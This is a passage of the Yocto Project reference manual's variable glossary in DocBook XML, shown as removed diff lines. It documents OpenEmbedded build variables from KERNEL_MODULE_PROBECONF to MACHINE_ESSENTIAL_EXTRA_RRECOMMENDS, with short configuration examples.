- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_MODULE_PROBECONF'><glossterm>KERNEL_MODULE_PROBECONF</glossterm>
- <info>
- KERNEL_MODULE_PROBECONF[doc] = "Lists kernel modules for which the build system expects to find module_conf_* values that specify configuration for each of the modules."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Provides a list of modules for which the OpenEmbedded
- build system expects to find
- <filename>module_conf_</filename><replaceable>modname</replaceable>
- values that specify configuration for each of the modules.
- For information on how to provide those module
- configurations, see the
- <link linkend='var-module_conf'><filename>module_conf_*</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_PATH'><glossterm>KERNEL_PATH</glossterm>
- <info>
- KERNEL_PATH[doc] = "The location of the kernel sources. This variable is set to the value of the STAGING_KERNEL_DIR within the module class (module.bbclass)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The location of the kernel sources.
- This variable is set to the value of the
- <link linkend='var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></link>
- within the
- <link linkend='ref-classes-module'><filename>module</filename></link>
- class.
- For information on how this variable is used, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual.
- </para>
-
- <para>
- To help maximize compatibility with out-of-tree drivers
- used to build modules, the OpenEmbedded build system also
- recognizes and uses the
- <link linkend='var-KERNEL_SRC'><filename>KERNEL_SRC</filename></link>
- variable, which is identical to the
- <filename>KERNEL_PATH</filename> variable.
- Both variables are common variables used by external
- Makefiles to point to the kernel source directory.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_SRC'><glossterm>KERNEL_SRC</glossterm>
- <info>
- KERNEL_SRC[doc] = "The location of the kernel sources. This variable is set to the value of the STAGING_KERNEL_DIR within the module class (module.bbclass)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The location of the kernel sources.
- This variable is set to the value of the
- <link linkend='var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></link>
- within the
- <link linkend='ref-classes-module'><filename>module</filename></link>
- class.
- For information on how this variable is used, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual.
- </para>
-
- <para>
- To help maximize compatibility with out-of-tree drivers
- used to build modules, the OpenEmbedded build system also
- recognizes and uses the
- <link linkend='var-KERNEL_PATH'><filename>KERNEL_PATH</filename></link>
- variable, which is identical to the
- <filename>KERNEL_SRC</filename> variable.
- Both variables are common variables used by external
- Makefiles to point to the kernel source directory.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNEL_VERSION'><glossterm>KERNEL_VERSION</glossterm>
- <info>
- KERNEL_VERSION[doc] = "Specifies the version of the kernel as extracted from version.h or utsrelease.h within the kernel sources."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the version of the kernel as extracted from
- <filename>version.h</filename> or
- <filename>utsrelease.h</filename> within the kernel sources.
- Effects of setting this variable do not take affect until
- the kernel has been configured.
- Consequently, attempting to refer to this variable in
- contexts prior to configuration will not work.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KERNELDEPMODDEPEND'><glossterm>KERNELDEPMODDEPEND</glossterm>
- <info>
- KERNELDEPMODDEPEND[doc] = "Specifies whether or not to use the data referenced through the PKGDATA_DIR directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies whether the data referenced through
- <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
- is needed or not.
- The <filename>KERNELDEPMODDEPEND</filename> does not
- control whether or not that data exists,
- but simply whether or not it is used.
- If you do not need to use the data, set the
- <filename>KERNELDEPMODDEPEND</filename> variable in your
- <filename>initramfs</filename> recipe.
- Setting the variable there when the data is not needed
- avoids a potential dependency loop.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KFEATURE_DESCRIPTION'><glossterm>KFEATURE_DESCRIPTION</glossterm>
- <info>
- KFEATURE_DESCRIPTION[doc] = "Provides a short description of a configuration fragment. You use this variable in the .scc file that describes a configuration fragment file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Provides a short description of a configuration fragment.
- You use this variable in the <filename>.scc</filename>
- file that describes a configuration fragment file.
- Here is the variable used in a file named
- <filename>smp.scc</filename> to describe SMP being
- enabled:
- <literallayout class='monospaced'>
- define KFEATURE_DESCRIPTION "Enable SMP"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KMACHINE'><glossterm>KMACHINE</glossterm>
- <info>
- KMACHINE[doc] = "The machine as known by the kernel."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The machine as known by the kernel.
- Sometimes the machine name used by the kernel does not
- match the machine name used by the OpenEmbedded build
- system.
- For example, the machine name that the OpenEmbedded build
- system understands as
- <filename>core2-32-intel-common</filename> goes by a
- different name in the Linux Yocto kernel.
- The kernel understands that machine as
- <filename>intel-core2-32</filename>.
- For cases like these, the <filename>KMACHINE</filename>
- variable maps the kernel machine name to the OpenEmbedded
- build system machine name.
- </para>
-
- <para>
- These mappings between different names occur in the
- Yocto Linux Kernel's <filename>meta</filename> branch.
- As an example take a look in the
- <filename>common/recipes-kernel/linux/linux-yocto_3.19.bbappend</filename>
- file:
- <literallayout class='monospaced'>
- LINUX_VERSION_core2-32-intel-common = "3.19.0"
- COMPATIBLE_MACHINE_core2-32-intel-common = "${MACHINE}"
- SRCREV_meta_core2-32-intel-common = "8897ef68b30e7426bc1d39895e71fb155d694974"
- SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711"
- KMACHINE_core2-32-intel-common = "intel-core2-32"
- KBRANCH_core2-32-intel-common = "standard/base"
- KERNEL_FEATURES_append_core2-32-intel-common = "${KERNEL_FEATURES_INTEL_COMMON}"
- </literallayout>
- The <filename>KMACHINE</filename> statement says that
- the kernel understands the machine name as
- "intel-core2-32".
- However, the OpenEmbedded build system understands the
- machine as "core2-32-intel-common".
- </para>
-
- </glossdef>
- </glossentry>
-
- <glossentry id='var-KTYPE'><glossterm>KTYPE</glossterm>
- <info>
- KTYPE[doc] = "Defines the kernel type to be used in assembling the configuration."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the kernel type to be used in assembling the
- configuration.
- The linux-yocto recipes define "standard", "tiny",
- and "preempt-rt" kernel types.
- See the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#kernel-types'>Kernel Types</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual for more information on kernel types.
- </para>
-
- <para>
- You define the <filename>KTYPE</filename> variable in the
- <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#bsp-descriptions'>BSP Descriptions</ulink>.
- The value you use must match the value used for the
- <link linkend='var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></link>
- value used by the kernel recipe.
- </para>
- </glossdef>
- </glossentry>
- </glossdiv>
-
- <glossdiv id='var-glossary-l'><title>L</title>
-
- <glossentry id='var-LABELS'><glossterm>LABELS</glossterm>
- <info>
- LABELS[doc] = "Provides a list of targets for automatic configuration."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Provides a list of targets for automatic configuration.
- </para>
-
- <para>
- See the
- <link linkend='ref-classes-grub-efi'><filename>grub-efi</filename></link>
- class for more information on how this variable is used.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LAYERDEPENDS'><glossterm>LAYERDEPENDS</glossterm>
- <info>
- LAYERDEPENDS[doc] = "Lists the layers, separated by spaces, on which this recipe depends. This variable is used in the conf/layer.conf file and must be suffixed with the name of the specific layer."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists the layers, separated by spaces, on which this
- recipe depends.
- Optionally, you can specify a specific layer version for a
- dependency by adding it to the end of the layer name.
- Here is an example:
- <literallayout class='monospaced'>
- LAYERDEPENDS_mylayer = "anotherlayer (=3)"
- </literallayout>
- In this previous example, version 3 of "anotherlayer"
- is compared against
- <link linkend='var-LAYERVERSION'><filename>LAYERVERSION</filename></link><filename>_anotherlayer</filename>.
- </para>
-
- <para>
- An error is produced if any dependency is missing or
- the version numbers (if specified) do not match exactly.
- This variable is used in the
- <filename>conf/layer.conf</filename> file and must be
- suffixed with the name of the specific layer (e.g.
- <filename>LAYERDEPENDS_mylayer</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LAYERDIR'><glossterm>LAYERDIR</glossterm>
- <info>
- LAYERDIR[doc] = "When used inside the layer.conf configuration file, this variable provides the path of the current layer."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When used inside the <filename>layer.conf</filename> configuration
- file, this variable provides the path of the current layer.
- This variable is not available outside of <filename>layer.conf</filename>
- and references are expanded immediately when parsing of the file completes.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LAYERRECOMMENDS'><glossterm>LAYERRECOMMENDS</glossterm>
- <info>
- LAYERRECOMMENDS[doc] = "Lists the layers, separated by spaces, recommended for use with this layer."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists the layers, separated by spaces, recommended for
- use with this layer.
- </para>
-
- <para>
- Optionally, you can specify a specific layer version for a
- recommendation by adding the version to the end of the
- layer name.
- Here is an example:
- <literallayout class='monospaced'>
- LAYERRECOMMENDS_mylayer = "anotherlayer (=3)"
- </literallayout>
- In this previous example, version 3 of "anotherlayer" is
- compared against
- <filename>LAYERVERSION_anotherlayer</filename>.
- </para>
-
- <para>
- This variable is used in the
- <filename>conf/layer.conf</filename> file and must be
- suffixed with the name of the specific layer (e.g.
- <filename>LAYERRECOMMENDS_mylayer</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LAYERSERIES_COMPAT'><glossterm>LAYERSERIES_COMPAT</glossterm>
- <info>
- LAYERSERIES_COMPAT[doc] = "Lists the OpenEmbedded-Core versions for which a layer is compatible."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists the versions of the
- <link linkend='oe-core'>OpenEmbedded-Core</link> for which
- a layer is compatible.
- Using the <filename>LAYERSERIES_COMPAT</filename> variable
- allows the layer maintainer to indicate which combinations
- of the layer and OE-Core can be expected to work.
- The variable gives the system a way to detect when a layer
- has not been tested with new releases of OE-Core (e.g.
- the layer is not maintained).
- </para>
-
- <para>
- To specify the OE-Core versions for which a layer is
- compatible, use this variable in your layer's
- <filename>conf/layer.conf</filename> configuration file.
- For the list, use the Yocto Project
- <ulink url='https://wiki.yoctoproject.org/wiki/Releases'>Release Name</ulink>
- (e.g. &DISTRO_NAME_NO_CAP;).
- To specify multiple OE-Core versions for the layer,
- use a space-separated list:
- <literallayout class='monospaced'>
- LAYERSERIES_COMPAT_<replaceable>layer_root_name</replaceable> = "&DISTRO_NAME_NO_CAP; &DISTRO_NAME_NO_CAP_MINUS_ONE;"
- </literallayout>
- <note>
- Setting <filename>LAYERSERIES_COMPAT</filename> is
- required by the Yocto Project Compatible version 2
- standard.
- The OpenEmbedded build system produces a warning if
- the variable is not set for any given layer.
- </note>
- </para>
-
- <para>
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-your-own-layer'>Creating Your Own Layer</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LAYERVERSION'><glossterm>LAYERVERSION</glossterm>
- <info>
- LAYERVERSION[doc] = "Optionally specifies the version of a layer as a single number. This variable is used in the conf/layer.conf file and must be suffixed with the name of the specific layer."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Optionally specifies the version of a layer as a single number.
- You can use this within
- <link linkend='var-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></link>
- for another layer in order to depend on a specific version
- of the layer.
- This variable is used in the <filename>conf/layer.conf</filename> file
- and must be suffixed with the name of the specific layer (e.g.
- <filename>LAYERVERSION_mylayer</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LD'><glossterm>LD</glossterm>
- <info>
- LD[doc] = "Minimal command and arguments to run the linker."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments used to run the
- linker.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LDFLAGS'><glossterm>LDFLAGS</glossterm>
- <info>
- LDFLAGS[doc] = "Specifies the flags to pass to the linker."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the linker.
- This variable is exported to an environment
- variable and thus made visible to the software being
- built during the compilation step.
- </para>
-
- <para>
- Default initialization for <filename>LDFLAGS</filename>
- varies depending on what is being built:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-TARGET_LDFLAGS'><filename>TARGET_LDFLAGS</filename></link>
- when building for the target
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILD_LDFLAGS'><filename>BUILD_LDFLAGS</filename></link>
- when building for the build host (i.e.
- <filename>-native</filename>)
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILDSDK_LDFLAGS'><filename>BUILDSDK_LDFLAGS</filename></link>
- when building for an SDK (i.e.
- <filename>nativesdk-</filename>)
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LEAD_SONAME'><glossterm>LEAD_SONAME</glossterm>
- <info>
- LEAD_SONAME[doc] = "Specifies the lead (or primary) compiled library file (i.e. .so) that the debian class applies its naming policy to given a recipe that packages multiple libraries."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the lead (or primary) compiled library file
- (i.e. <filename>.so</filename>) that the
- <link linkend='ref-classes-debian'><filename>debian</filename></link>
- class applies its naming policy to given a recipe that
- packages multiple libraries.
- </para>
-
- <para>
- This variable works in conjunction with the
- <filename>debian</filename> class.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LIC_FILES_CHKSUM'><glossterm>LIC_FILES_CHKSUM</glossterm>
- <info>
- LIC_FILES_CHKSUM[doc] = "Checksums of the license text in the recipe source code."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Checksums of the license text in the recipe source code.
- </para>
-
- <para>
- This variable tracks changes in license text of the source
- code files.
- If the license text is changed, it will trigger a build
- failure, which gives the developer an opportunity to review any
- license change.
- </para>
-
- <para>
- This variable must be defined for all recipes (unless
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- is set to "CLOSED").</para>
- <para>For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-configuring-LIC_FILES_CHKSUM'>Tracking License Changes</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LICENSE'><glossterm>LICENSE</glossterm>
- <info>
- LICENSE[doc] = "The list of source licenses for the recipe. The logical operators &amp;, '|', and parentheses can be used."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The list of source licenses for the recipe.
- Follow these rules:
- <itemizedlist>
- <listitem><para>Do not use spaces within individual
- license names.</para></listitem>
- <listitem><para>Separate license names using
- | (pipe) when there is a choice between licenses.
- </para></listitem>
- <listitem><para>Separate license names using
- &amp; (ampersand) when multiple licenses exist
- that cover different parts of the source.
- </para></listitem>
- <listitem><para>You can use spaces between license
- names.</para></listitem>
- <listitem><para>For standard licenses, use the names
- of the files in
- <filename>meta/files/common-licenses/</filename>
- or the
- <link linkend='var-SPDXLICENSEMAP'><filename>SPDXLICENSEMAP</filename></link>
- flag names defined in
- <filename>meta/conf/licenses.conf</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Here are some examples:
- <literallayout class='monospaced'>
- LICENSE = "LGPLv2.1 | GPLv3"
- LICENSE = "MPL-1 &amp; LGPLv2.1"
- LICENSE = "GPLv2+"
- </literallayout>
- The first example is from the recipes for Qt, which the user
- may choose to distribute under either the LGPL version
- 2.1 or GPL version 3.
- The second example is from Cairo where two licenses cover
- different parts of the source code.
- The final example is from <filename>sysstat</filename>,
- which presents a single license.
- </para>
-
- <para>
- You can also specify licenses on a per-package basis to
- handle situations where components of the output have
- different licenses.
- For example, a piece of software whose code is
- licensed under GPLv2 but has accompanying documentation
- licensed under the GNU Free Documentation License 1.2 could
- be specified as follows:
- <literallayout class='monospaced'>
- LICENSE = "GFDL-1.2 &amp; GPLv2"
- LICENSE_${PN} = "GPLv2"
- LICENSE_${PN}-doc = "GFDL-1.2"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LICENSE_CREATE_PACKAGE'><glossterm>LICENSE_CREATE_PACKAGE</glossterm>
- <info>
- LICENSE_CREATE_PACKAGE[doc] = "Creates an extra package (i.e. ${PN}-lic) for each recipe and adds that package to the RRECOMMENDS+${PN}."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Setting <filename>LICENSE_CREATE_PACKAGE</filename>
- to "1" causes the OpenEmbedded build system to create
- an extra package (i.e.
- <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-lic</filename>)
- for each recipe and to add those packages to the
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link><filename>_${PN}</filename>.
- </para>
-
- <para>
- The <filename>${PN}-lic</filename> package installs a
- directory in <filename>/usr/share/licenses</filename>
- named <filename>${PN}</filename>, which is the recipe's
- base name, and installs files in that directory that
- contain license and copyright information (i.e. copies of
- the appropriate license files from
- <filename>meta/common-licenses</filename> that match the
- licenses specified in the
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- variable of the recipe metadata and copies of files marked
- in
- <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>
- as containing license text).
- </para>
-
- <para>
- For related information on providing license text, see the
- <link linkend='var-COPY_LIC_DIRS'><filename>COPY_LIC_DIRS</filename></link>
- variable, the
- <link linkend='var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></link>
- variable, and the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#providing-license-text'>Providing License Text</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LICENSE_FLAGS'><glossterm>LICENSE_FLAGS</glossterm>
- <info>
- LICENSE_FLAGS[doc] = "Specifies additional flags for a recipe you must whitelist through LICENSE_FLAGS_WHITELIST in order to allow the recipe to be built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies additional flags for a recipe you must
- whitelist through
- <link linkend='var-LICENSE_FLAGS_WHITELIST'><filename>LICENSE_FLAGS_WHITELIST</filename></link>
- in order to allow the recipe to be built.
- When providing multiple flags, separate them with
- spaces.
- </para>
-
- <para>
- This value is independent of
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- and is typically used to mark recipes that might
- require additional licenses in order to be used in a
- commercial product.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-commercially-licensed-recipes'>Enabling Commercially Licensed Recipes</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LICENSE_FLAGS_WHITELIST'><glossterm>LICENSE_FLAGS_WHITELIST</glossterm>
- <info>
- LICENSE_FLAGS_WHITELIST[doc] = "Lists license flags that when specified in LICENSE_FLAGS within a recipe should not prevent that recipe from being built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists license flags that when specified in
- <link linkend='var-LICENSE_FLAGS'><filename>LICENSE_FLAGS</filename></link>
- within a recipe should not prevent that recipe from being
- built.
- This practice is otherwise known as "whitelisting"
- license flags.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-commercially-licensed-recipes'>Enabling Commercially Licensed Recipes</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LICENSE_PATH'><glossterm>LICENSE_PATH</glossterm>
- <info>
- LICENSE_PATH[doc] = "Path to additional licenses used during the build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Path to additional licenses used during the build.
- By default, the OpenEmbedded build system uses <filename>COMMON_LICENSE_DIR</filename>
- to define the directory that holds common license text used during the build.
- The <filename>LICENSE_PATH</filename> variable allows you to extend that
- location to other areas that have additional licenses:
- <literallayout class='monospaced'>
- LICENSE_PATH += "<replaceable>path-to-additional-common-licenses</replaceable>"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LINUX_KERNEL_TYPE'><glossterm>LINUX_KERNEL_TYPE</glossterm>
- <info>
- LINUX_KERNEL_TYPE[doc] = "Defines the kernel type to be used in assembling the configuration."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the kernel type to be used in assembling the
- configuration.
- The linux-yocto recipes define "standard", "tiny", and
- "preempt-rt" kernel types.
- See the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#kernel-types'>Kernel Types</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual for more information on kernel types.
- </para>
-
- <para>
- If you do not specify a
- <filename>LINUX_KERNEL_TYPE</filename>, it defaults to
- "standard".
- Together with
- <link linkend='var-KMACHINE'><filename>KMACHINE</filename></link>,
- the <filename>LINUX_KERNEL_TYPE</filename> variable
- defines the search
- arguments used by the kernel tools to find the appropriate
- description within the kernel
- <link linkend='metadata'>Metadata</link>
- with which to build out the sources and configuration.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LINUX_VERSION'><glossterm>LINUX_VERSION</glossterm>
- <info>
- LINUX_VERSION[doc] = "The Linux version from kernel.org on which the Linux kernel image being built using the OpenEmbedded build system is based. You define this variable in the kernel recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The Linux version from <filename>kernel.org</filename>
- on which the Linux kernel image being built using the
- OpenEmbedded build system is based.
- You define this variable in the kernel recipe.
- For example, the <filename>linux-yocto-3.4.bb</filename>
- kernel recipe found in
- <filename>meta/recipes-kernel/linux</filename>
- defines the variables as follows:
- <literallayout class='monospaced'>
- LINUX_VERSION ?= "3.4.24"
- </literallayout>
- </para>
-
- <para>
- The <filename>LINUX_VERSION</filename> variable is used to
- define <link linkend='var-PV'><filename>PV</filename></link>
- for the recipe:
- <literallayout class='monospaced'>
- PV = "${LINUX_VERSION}+git${SRCPV}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LINUX_VERSION_EXTENSION'><glossterm>LINUX_VERSION_EXTENSION</glossterm>
- <info>
- LINUX_VERSION_EXTENSION[doc] = "A string extension compiled into the version string of the Linux kernel built with the OpenEmbedded build system. You define this variable in the kernel recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A string extension compiled into the version
- string of the Linux kernel built with the OpenEmbedded
- build system.
- You define this variable in the kernel recipe.
- For example, the linux-yocto kernel recipes all define
- the variable as follows:
- <literallayout class='monospaced'>
- LINUX_VERSION_EXTENSION ?= "-yocto-${<link linkend='var-LINUX_KERNEL_TYPE'>LINUX_KERNEL_TYPE</link>}"
- </literallayout>
- </para>
-
- <para>
- Defining this variable essentially sets the
- Linux kernel configuration item
- <filename>CONFIG_LOCALVERSION</filename>, which is visible
- through the <filename>uname</filename> command.
- Here is an example that shows the extension assuming it
- was set as previously shown:
- <literallayout class='monospaced'>
- $ uname -r
- 3.7.0-rc8-custom
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-LOG_DIR'><glossterm>LOG_DIR</glossterm>
- <info>
- LOG_DIR[doc] = "Specifies the directory to which the OpenEmbedded build system writes overall log files. The default directory is ${TMPDIR}/log"
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the directory to which the OpenEmbedded build
- system writes overall log files.
- The default directory is <filename>${TMPDIR}/log</filename>.
- </para>
-
- <para>
- For the directory containing logs specific to each task,
- see the <link linkend='var-T'><filename>T</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-m'><title>M</title>
-
- <glossentry id='var-MACHINE'><glossterm>MACHINE</glossterm>
- <info>
- MACHINE[doc] = "Specifies the target device for which the image is built. You define MACHINE in the conf/local.conf file in the Build Directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the target device for which the image is built.
- You define <filename>MACHINE</filename> in the
- <filename>local.conf</filename> file found in the
- <link linkend='build-directory'>Build Directory</link>.
- By default, <filename>MACHINE</filename> is set to
- "qemux86", which is an x86-based architecture machine to
- be emulated using QEMU:
- <literallayout class='monospaced'>
- MACHINE ?= "qemux86"
- </literallayout>
- </para>
-
- <para>
- The variable corresponds to a machine configuration file of the
- same name, through which machine-specific configurations are set.
- Thus, when <filename>MACHINE</filename> is set to "qemux86" there
- exists the corresponding <filename>qemux86.conf</filename> machine
- configuration file, which can be found in the
- <link linkend='source-directory'>Source Directory</link>
- in <filename>meta/conf/machine</filename>.
- </para>
-
- <para>
- The list of machines supported by the Yocto Project as
- shipped include the following:
- <literallayout class='monospaced'>
- MACHINE ?= "qemuarm"
- MACHINE ?= "qemuarm64"
- MACHINE ?= "qemumips"
- MACHINE ?= "qemumips64"
- MACHINE ?= "qemuppc"
- MACHINE ?= "qemux86"
- MACHINE ?= "qemux86-64"
- MACHINE ?= "genericx86"
- MACHINE ?= "genericx86-64"
- MACHINE ?= "beaglebone"
- MACHINE ?= "edgerouter"
- </literallayout>
- The last five are Yocto Project reference hardware boards, which
- are provided in the <filename>meta-yocto-bsp</filename> layer.
- <note>Adding additional Board Support Package (BSP) layers
- to your configuration adds new possible settings for
- <filename>MACHINE</filename>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_ARCH'><glossterm>MACHINE_ARCH</glossterm>
- <info>
- MACHINE_ARCH[doc] = "Specifies the name of the machine-specific architecture. This variable is set automatically from MACHINE or TUNE_PKGARCH."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the name of the machine-specific architecture.
- This variable is set automatically from
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- or
- <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>.
- You should not hand-edit the
- <filename>MACHINE_ARCH</filename> variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'><glossterm>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</glossterm>
- <info>
- MACHINE_ESSENTIAL_EXTRA_RDEPENDS[doc] = "A list of required machine-specific packages to install as part of the image being built. Because this is a 'machine-essential' variable, the list of packages are essential for the machine to boot."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of required machine-specific packages to install as part of
- the image being built.
- The build process depends on these packages being present.
- Furthermore, because this is a "machine-essential" variable, the list of
- packages are essential for the machine to boot.
- The impact of this variable affects images based on
- <filename>packagegroup-core-boot</filename>,
- including the <filename>core-image-minimal</filename> image.
- </para>
-
- <para>
- This variable is similar to the
- <filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</link></filename>
- variable with the exception that the image being built has a build
- dependency on the variable's list of packages.
- In other words, the image will not build if a file in this list is not found.
- </para>
-
- <para>
- As an example, suppose the machine for which you are building requires
- <filename>example-init</filename> to be run during boot to initialize the hardware.
- In this case, you would use the following in the machine's
- <filename>.conf</filename> configuration file:
- <literallayout class='monospaced'>
- MACHINE_ESSENTIAL_EXTRA_RDEPENDS += "example-init"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><glossterm>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</glossterm>
- <info>
- MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS[doc] = "A list of recommended machine-specific packages to install as part of the image being built. Because this is a 'machine-essential' variable, the list of packages are essential for the machine to boot."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of recommended machine-specific packages to install as part of
- the image being built.
- The build process does not depend on these packages being present.
- However, because this is a "machine-essential" variable, the list of
- packages are essential for the machine to boot.
- The impact of this variable affects images based on
- <filename>packagegroup-core-boot</filename>,
- including the <filename>core-image-minimal</filename> image.
- </para>
-
- <para>
- This variable is similar to the
- <filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</link></filename>
- variable with the exception that the image being built does not have a build
- dependency on the variable's list of packages.
- In other words, the image will still build if a package in this list is not found.
- Typically, this variable is used to handle essential kernel modules, whose
- functionality may be selected to be built into the kernel rather than as a module,
- in which case a package will not be produced.
- </para>
-
- <para>
- Consider an example where you have a custom kernel where a specific touchscreen
- driver is required for the machine to be usable.
- However, the driver can be built as a module or
- into the kernel depending on the kernel configuration.
- If the driver is built as a module, you want it to be installed.
- But, when the driver is built into the kernel, you still want the
- build to succeed.
- This variable sets up a "recommends" relationship so that in the latter case,
- the build will not fail due to the missing package.
- To accomplish this, assuming the package for the module was called
- <filename>kernel-module-ab123</filename>, you would use the
- following in the machine's <filename>.conf</filename> configuration
- file:
- <literallayout class='monospaced'>
- MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-module-ab123"
- </literallayout>
- <note>
- In this example, the
- <filename>kernel-module-ab123</filename> recipe
- needs to explicitly set its
- <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
- variable to ensure that BitBake does not use the
- kernel recipe's
- <link linkend='var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></link>
- variable to satisfy the dependency.
- </note>
- </para>
-
- <para>
